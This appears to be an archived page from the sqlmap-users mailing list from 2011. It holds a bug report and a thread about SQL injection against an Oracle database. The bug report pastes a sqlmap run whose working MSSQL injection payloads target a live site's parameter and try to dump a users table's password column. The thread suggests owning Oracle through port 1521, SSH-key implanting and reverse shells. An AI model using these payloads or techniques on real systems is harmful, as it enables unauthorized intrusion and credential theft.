http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Vinícius ~ <vin...@gm...> - 2011-05-26 07:40:41
|
./sqlmap.py -u "http://[snip]/Poll.aspx?id=10" -T usuario -C
USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump
sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover
tool
http://sqlmap.sourceforge.net
[*] starting at: 19:35:11
[19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session
file
[19:35:11] [INFO] resuming injection data from session file
[19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
session file
[19:35:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 3888=3888
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: id=10 AND
3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT
(CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=10; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=10 WAITFOR DELAY '0:0:5'--
---
[19:35:12] [INFO] for manual usage GET and POST payloads require url
encoding
[19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[19:35:12] [WARNING] missing database parameter, sqlmap is going to use the
current database to enumerate table(s) entries
[19:35:12] [INFO] fetching current database
[19:35:12] [INFO] read from file '/home/[snip]/session': [snip]
do you want to use LIKE operator to retrieve column names similar to the
ones provided with the -C option? [Y/n] n
[19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO,
USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club'
[19:35:15] [INFO] the SQL query used returns 3 entries
[19:35:15] [CRITICAL] connection exception detected. sqlmap will display
partial output'page not found (404)'
[19:35:16] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times
[19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3952)
Python version: 2.6.6
Operating system: posix
Command line: ./sqlmap.py -u
************************************************************ -T usuario -C
********************************************* --dump
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 84, in main
start()
File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start
action()
File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action
conf.dbmsHandler.dumpTable()
File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in
dumpTable
self.getColumns(onlyColNames=True)
File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in
getColumns
if columnData[0] is not None:
TypeError: 'NoneType' object is unsubscriptable
[*] shutting down at: 19:35:1
-
Thanx!
|
|
From: Chris O. <chr...@gm...> - 2011-05-25 11:13:48
|
Thanks James I'll take a look and also pass this on to the rest of the team. Cheers Chris On 25 May 2011 12:10, <ja...@ev...> wrote: > Chris, > > If you like to learn about severely owning Oracle a nice place to start > might be my blog =). http://security.is.doomed.org/wordpress/ > > Also you can head over to a friend of mines site, > http://pentestmonkey.net/cheat-sheets/ for all types of good SQL injection > cheat info. =) > > There is a nice article on exploiting a few methods of oracle. One is > implanting a ssh key in a log file you control ( you can change it to > authorized_keys). The other method walks you through actually bruteforicing > the database SID, cracking a login, then elevating to DB and running some > Java programs to spawn a reverse connecting shell back to you. > > Honestly, If you ever respected Oracle .. You wont after learning how to > own the product. > > Theres also some stuff on there about owning NFS, JBoss/Tomcat and a > buncha other junk. Also some codes i wrote > > James > > > > On Wed, 25 May 2011 11:39:22 +0100, Chris Oakley wrote: > >> Thanks for the assistance guys. I'll inspect the contents of that >> schema specifically in that case. I should have mentioned that I >> used --exclude-sysdbs with the --dbs flag, I think I just had doubts >> about the results even so! Unfortunately there are no ports other >> than 80 and 443 open so access to this is strictly through the web >> application we're testing. I definitely need to learn more about >> Oracle. >> >> Chris >> >> On 25 May 2011 11:29, wrote: >> >> >> Chris, >>> >>> Before bothering with Sqlmap for the injection it might be worth >>> it to >>> check if you can actually access the Oracle instance remotely. You >>> can >>> do this by connecting to the database on port 1521, this is >>> 'tnslistener'. >>> >>> If you can connect to 1521/tcp there's a lot easier ways to >>> manipulate/own the database without sqlmap. Probably quite faster. >>> Also, >>> having access to TNS increases your chances by 50% of owning the >>> underlying OS. >>> >>> James >>> >>> On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote: >>> > Hi All >>> > >>> > Not a sqlmap question as such, but maybe someone can help. I've >>> > found an sqli flaw in a test that has resulted in the following: >>> > >>> > --- >>> > banner: 'Oracle Database 10g Enterprise Edition Release >>> > 10.2.0.4.0 - 64bi' >>> > current user is DBA: 'False' >>> > current user: 'IFSSYS' >>> > >>> > available databases [4]: >>> > [*] CTXSYS >>> > [*] IFSSYS >>> > [*] SYS >>> > [*] SYSTEM >>> > --- >>> > >>> > These all seem to be system databases. I don't know enough >>> about >>> > Oracle to know if 1) they are all sys dbs 2) if there's anywhere >>> I >>> > can >>> > go from here. The content of these databases seems to be all >>> related >>> > to privs and such within Oracle. What I'm looking for is the >>> web app >>> > data. Does anyone more familiar with Oracle know why it would >>> only >>> > be systems databases accessible through the sqli flaw? >>> > >>> > We can try other tactics later but I was just wondering if this >>> is >>> > normal from a data extraction point of view with Oracle. I've >>> dumped >>> > a fair amount of the data and there's none systems related so >>> far... >>> > >>> > Cheers >>> > >>> > Chris >>> >>> >>> >> >> ------------------------------------------------------------------------------ >> >>> vRanger cuts backup time in half-while increasing security. >>> With the market-leading solution for virtual backup and recovery, >>> you get blazing-fast, flexible, and affordable data protection. >>> Download your free trial now. >>> http://p.sf.net/sfu/quest-d2dcopy1 [1] >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... [2] >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [3] >>> >> >> >> >> Links: >> ------ >> [1] http://p.sf.net/sfu/quest-d2dcopy1 >> [2] mailto:sql...@li... >> [3] https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> [4] mailto:ja...@ev... >> > > |
|
From: <ja...@ev...> - 2011-05-25 11:10:57
|
Chris, If you like to learn about severely owning Oracle a nice place to start might be my blog =). http://security.is.doomed.org/wordpress/ Also you can head over to a friend of mines site, http://pentestmonkey.net/cheat-sheets/ for all types of good SQL injection cheat info. =) There is a nice article on exploiting a few methods of oracle. One is implanting a ssh key in a log file you control ( you can change it to authorized_keys). The other method walks you through actually bruteforicing the database SID, cracking a login, then elevating to DB and running some Java programs to spawn a reverse connecting shell back to you. Honestly, If you ever respected Oracle .. You wont after learning how to own the product. Theres also some stuff on there about owning NFS, JBoss/Tomcat and a buncha other junk. Also some codes i wrote James On Wed, 25 May 2011 11:39:22 +0100, Chris Oakley wrote: > Thanks for the assistance guys. I'll inspect the contents of that > schema specifically in that case. I should have mentioned that I > used --exclude-sysdbs with the --dbs flag, I think I just had doubts > about the results even so! Unfortunately there are no ports other > than 80 and 443 open so access to this is strictly through the web > application we're testing. I definitely need to learn more about > Oracle. > > Chris > > On 25 May 2011 11:29, wrote: > >> Chris, >> >> Before bothering with Sqlmap for the injection it might be worth >> it to >> check if you can actually access the Oracle instance remotely. You >> can >> do this by connecting to the database on port 1521, this is >> 'tnslistener'. >> >> If you can connect to 1521/tcp there's a lot easier ways to >> manipulate/own the database without sqlmap. Probably quite faster. >> Also, >> having access to TNS increases your chances by 50% of owning the >> underlying OS. >> >> James >> >> On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote: >> > Hi All >> > >> > Not a sqlmap question as such, but maybe someone can help. I've >> > found an sqli flaw in a test that has resulted in the following: >> > >> > --- >> > banner: 'Oracle Database 10g Enterprise Edition Release >> > 10.2.0.4.0 - 64bi' >> > current user is DBA: 'False' >> > current user: 'IFSSYS' >> > >> > available databases [4]: >> > [*] CTXSYS >> > [*] IFSSYS >> > [*] SYS >> > [*] SYSTEM >> > --- >> > >> > These all seem to be system databases. I don't know enough >> about >> > Oracle to know if 1) they are all sys dbs 2) if there's anywhere >> I >> > can >> > go from here. The content of these databases seems to be all >> related >> > to privs and such within Oracle. What I'm looking for is the >> web app >> > data. Does anyone more familiar with Oracle know why it would >> only >> > be systems databases accessible through the sqli flaw? >> > >> > We can try other tactics later but I was just wondering if this >> is >> > normal from a data extraction point of view with Oracle. I've >> dumped >> > a fair amount of the data and there's none systems related so >> far... >> > >> > Cheers >> > >> > Chris >> >> > > ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 [1] >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... [2] >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [3] > > > > Links: > ------ > [1] http://p.sf.net/sfu/quest-d2dcopy1 > [2] mailto:sql...@li... > [3] https://lists.sourceforge.net/lists/listinfo/sqlmap-users > [4] mailto:ja...@ev... |
|
From: Chris O. <chr...@gm...> - 2011-05-25 10:39:30
|
Thanks for the assistance guys. I'll inspect the contents of that schema specifically in that case. I should have mentioned that I used --exclude-sysdbs with the --dbs flag, I think I just had doubts about the results even so! Unfortunately there are no ports other than 80 and 443 open so access to this is strictly through the web application we're testing. I definitely need to learn more about Oracle. Chris On 25 May 2011 11:29, <ja...@ev...> wrote: > Chris, > > Before bothering with Sqlmap for the injection it might be worth it to > check if you can actually access the Oracle instance remotely. You can > do this by connecting to the database on port 1521, this is > 'tnslistener'. > > If you can connect to 1521/tcp there's a lot easier ways to > manipulate/own the database without sqlmap. Probably quite faster. Also, > having access to TNS increases your chances by 50% of owning the > underlying OS. > > James > > On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote: > > Hi All > > > > Not a sqlmap question as such, but maybe someone can help. I've > > found an sqli flaw in a test that has resulted in the following: > > > > --- > > banner: 'Oracle Database 10g Enterprise Edition Release > > 10.2.0.4.0 - 64bi' > > current user is DBA: 'False' > > current user: 'IFSSYS' > > > > available databases [4]: > > [*] CTXSYS > > [*] IFSSYS > > [*] SYS > > [*] SYSTEM > > --- > > > > These all seem to be system databases. I don't know enough about > > Oracle to know if 1) they are all sys dbs 2) if there's anywhere I > > can > > go from here. The content of these databases seems to be all related > > to privs and such within Oracle. What I'm looking for is the web app > > data. Does anyone more familiar with Oracle know why it would only > > be systems databases accessible through the sqli flaw? > > > > We can try other tactics later but I was just wondering if this is > > normal from a data extraction point of view with Oracle. I've dumped > > a fair amount of the data and there's none systems related so far... > > > > Cheers > > > > Chris > > > > ------------------------------------------------------------------------------ > vRanger cuts backup time in half-while increasing security. > With the market-leading solution for virtual backup and recovery, > you get blazing-fast, flexible, and affordable data protection. > Download your free trial now. > http://p.sf.net/sfu/quest-d2dcopy1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: <ja...@ev...> - 2011-05-25 10:29:28
|
Chris, Before bothering with Sqlmap for the injection it might be worth it to check if you can actually access the Oracle instance remotely. You can do this by connecting to the database on port 1521, this is 'tnslistener'. If you can connect to 1521/tcp there's a lot easier ways to manipulate/own the database without sqlmap. Probably quite faster. Also, having access to TNS increases your chances by 50% of owning the underlying OS. James On Wed, 25 May 2011 11:16:29 +0100, Chris Oakley wrote: > Hi All > > Not a sqlmap question as such, but maybe someone can help. I've > found an sqli flaw in a test that has resulted in the following: > > --- > banner: 'Oracle Database 10g Enterprise Edition Release > 10.2.0.4.0 - 64bi' > current user is DBA: 'False' > current user: 'IFSSYS' > > available databases [4]: > [*] CTXSYS > [*] IFSSYS > [*] SYS > [*] SYSTEM > --- > > These all seem to be system databases. I don't know enough about > Oracle to know if 1) they are all sys dbs 2) if there's anywhere I > can > go from here. The content of these databases seems to be all related > to privs and such within Oracle. What I'm looking for is the web app > data. Does anyone more familiar with Oracle know why it would only > be systems databases accessible through the sqli flaw? > > We can try other tactics later but I was just wondering if this is > normal from a data extraction point of view with Oracle. I've dumped > a fair amount of the data and there's none systems related so far... > > Cheers > > Chris |
|
From: Miroslav S. <mir...@gm...> - 2011-05-25 10:25:59
|
p.s. in future for questions like this "if 1) they are all sys dbs" there is a switch called: --exclude-sysdbs which will filter out all system database names from --dbs output kr On Wed, May 25, 2011 at 12:23 PM, Miroslav Stampar <mir...@gm...> wrote: > hi Chris. > > Oracle has a rather different "concept" for databases (from dumping > point of view). > > data is stored into "schemas" which are the same thing as "users", and > each user has it's tables under the same named schema. > > that means that your best best would be to use the: > > --tables -D IFSSYS <--- current user name > and then dump tables from there on > > also, be sure that you are using the latest revision from our repository > > kr > > On Wed, May 25, 2011 at 12:16 PM, Chris Oakley > <chr...@gm...> wrote: >> Hi All >> >> Not a sqlmap question as such, but maybe someone can help. I've found an >> sqli flaw in a test that has resulted in the following: >> >> --- >> banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - >> 64bi' >> current user is DBA: 'False' >> current user: 'IFSSYS' >> >> available databases [4]: >> [*] CTXSYS >> [*] IFSSYS >> [*] SYS >> [*] SYSTEM >> --- >> >> These all seem to be system databases. I don't know enough about Oracle to >> know if 1) they are all sys dbs 2) if there's anywhere I can go from here. >> The content of these databases seems to be all related to privs and such >> within Oracle. What I'm looking for is the web app data. Does anyone more >> familiar with Oracle know why it would only be systems databases accessible >> through the sqli flaw? >> >> We can try other tactics later but I was just wondering if this is normal >> from a data extraction point of view with Oracle. I've dumped a fair amount >> of the data and there's none systems related so far... >> >> Cheers >> >> Chris >> >> >> >> ------------------------------------------------------------------------------ >> vRanger cuts backup time in half-while increasing security. >> With the market-leading solution for virtual backup and recovery, >> you get blazing-fast, flexible, and affordable data protection. >> Download your free trial now. >> http://p.sf.net/sfu/quest-d2dcopy1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
48 messages has been excluded from this view by a project administrator.
